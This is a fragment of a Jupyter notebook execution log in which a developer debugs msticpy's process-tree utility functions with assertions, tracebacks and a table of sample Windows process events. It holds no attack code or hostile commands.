\u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 22\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren2\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m+\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 23\u001b[0m assert ptutil.get_summary_info(p_tree) == {\n\u001b[0;32m 24\u001b[0m \u001b[1;34m'Processes'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m1010\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_siblings\u001b[1;34m(procs, source, include_source)\u001b[0m\n\u001b[0;32m 770\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 771\u001b[0m \u001b[0mParameters\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 772\u001b[1;33m \u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 773\u001b[0m \u001b[0mprocs\u001b[0m \u001b[1;33m:\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 774\u001b[0m \u001b[0mProcess\u001b[0m \u001b[0mevents\u001b[0m \u001b[1;33m(\u001b[0m\u001b[1;32mwith\u001b[0m \u001b[0mprocess\u001b[0m \u001b[0mtree\u001b[0m \u001b[0mmetadata\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1539\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1540\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1542\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1543\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'" ] } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:06:57.495Z" }, { "cell": { "executionCount": 61, "executionEventId": "191494c1-7b0c-4891-944b-313d60a35ba2", "hasError": true, "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03", "outputs": [ { "ename": "TypeError", "evalue": "bad operand type for unary ~: 'str'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mTypeError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_siblings\u001b[1;34m(procs, source, include_source)\u001b[0m\n\u001b[0;32m 770\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 771\u001b[0m \u001b[0mParameters\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 772\u001b[1;33m \u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m-\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 773\u001b[0m \u001b[0mprocs\u001b[0m \u001b[1;33m:\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 774\u001b[0m \u001b[0mProcess\u001b[0m \u001b[0mevents\u001b[0m \u001b[1;33m(\u001b[0m\u001b[1;32mwith\u001b[0m \u001b[0mprocess\u001b[0m \u001b[0mtree\u001b[0m \u001b[0mmetadata\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__invert__\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1539\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m__invert__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1540\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1541\u001b[1;33m \u001b[0marr\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0moperator\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mcom\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mvalues_from_object\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1542\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__array_wrap__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0marr\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1543\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mTypeError\u001b[0m: bad operand type for unary ~: 'str'" ] } ], "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86", "text": "ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)" }, "executionTime": "2019-12-13T21:07:23.383Z" }, { "cell": { "executionCount": 62, "executionEventId": "a6c8e692-1f62-48bc-997d-4b514613da0f", "hasError": true, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "ename": "KeyError", "evalue": "'parent_key'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mKeyError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexes\\base.py\u001b[0m in \u001b[0;36mget_loc\u001b[1;34m(self, key, method, tolerance)\u001b[0m\n\u001b[0;32m 2896\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2897\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 2898\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mKeyError\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n", "\u001b[1;31mKeyError\u001b[0m: 'parent_key'", "\nDuring handling of the above exception, another exception occurred:\n", "\u001b[1;31mKeyError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 1\u001b[0m \u001b[0mparent\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_parent\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 2\u001b[0m \u001b[0mproc\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_process\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren2\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 3\u001b[1;33m \u001b[0msiblings\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mprocs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mparent\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0minclude_source\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mFalse\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 4\u001b[0m \u001b[0msiblings\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 5\u001b[0m \u001b[1;31m# if not include_source:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\sectools\\process_tree_utils.py\u001b[0m in \u001b[0;36mget_children\u001b[1;34m(procs, source, include_source)\u001b[0m\n\u001b[0;32m 665\u001b[0m ) -> pd.DataFrame:\n\u001b[0;32m 666\u001b[0m \"\"\"\n\u001b[1;32m--> 667\u001b[1;33m \u001b[0mReturn\u001b[0m \u001b[0mthe\u001b[0m \u001b[0mchild\u001b[0m \u001b[0mprocesses\u001b[0m \u001b[1;32mfor\u001b[0m \u001b[0mthe\u001b[0m \u001b[0msource\u001b[0m \u001b[0mprocess\u001b[0m\u001b[1;33m.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 668\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 669\u001b[0m \u001b[0mParameters\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\frame.py\u001b[0m in \u001b[0;36m__getitem__\u001b[1;34m(self, key)\u001b[0m\n\u001b[0;32m 2993\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcolumns\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mnlevels\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 2994\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_getitem_multilevel\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2995\u001b[1;33m \u001b[0mindexer\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcolumns\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 2996\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mis_integer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mindexer\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 2997\u001b[0m \u001b[0mindexer\u001b[0m \u001b[1;33m=\u001b[0m \u001b[1;33m[\u001b[0m\u001b[0mindexer\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\indexes\\base.py\u001b[0m in \u001b[0;36mget_loc\u001b[1;34m(self, key, method, tolerance)\u001b[0m\n\u001b[0;32m 2897\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 2898\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mKeyError\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 2899\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_loc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_maybe_cast_indexer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 2900\u001b[0m \u001b[0mindexer\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_indexer\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mkey\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mmethod\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mmethod\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mtolerance\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mtolerance\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 2901\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mindexer\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mndim\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0mindexer\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msize\u001b[0m \u001b[1;33m>\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/index.pyx\u001b[0m in \u001b[0;36mpandas._libs.index.IndexEngine.get_loc\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n", "\u001b[1;32mpandas/_libs/hashtable_class_helper.pxi\u001b[0m in \u001b[0;36mpandas._libs.hashtable.PyObjectHashTable.get_item\u001b[1;34m()\u001b[0m\n", "\u001b[1;31mKeyError\u001b[0m: 'parent_key'" ] } ], "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c", "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(procs, parent, include_source=False)\nsiblings\n# if not include_source:\n# return siblings.loc[~proc]\n# return siblings" }, "executionTime": "2019-12-13T21:10:06.868Z" }, { "cell": { "executionCount": 63, "executionEventId": "1cf10840-24e2-41d1-901e-4d2322db7fe0", "hasError": false, "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x15c8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/51004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:52:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xcd8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/81004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x8dc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/101004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xbd0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/151004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.26300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:02:56.263MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xe34...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/671004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.24700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.247MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x53c...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/761004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xef4...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/781004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:22:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xd74...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1071004
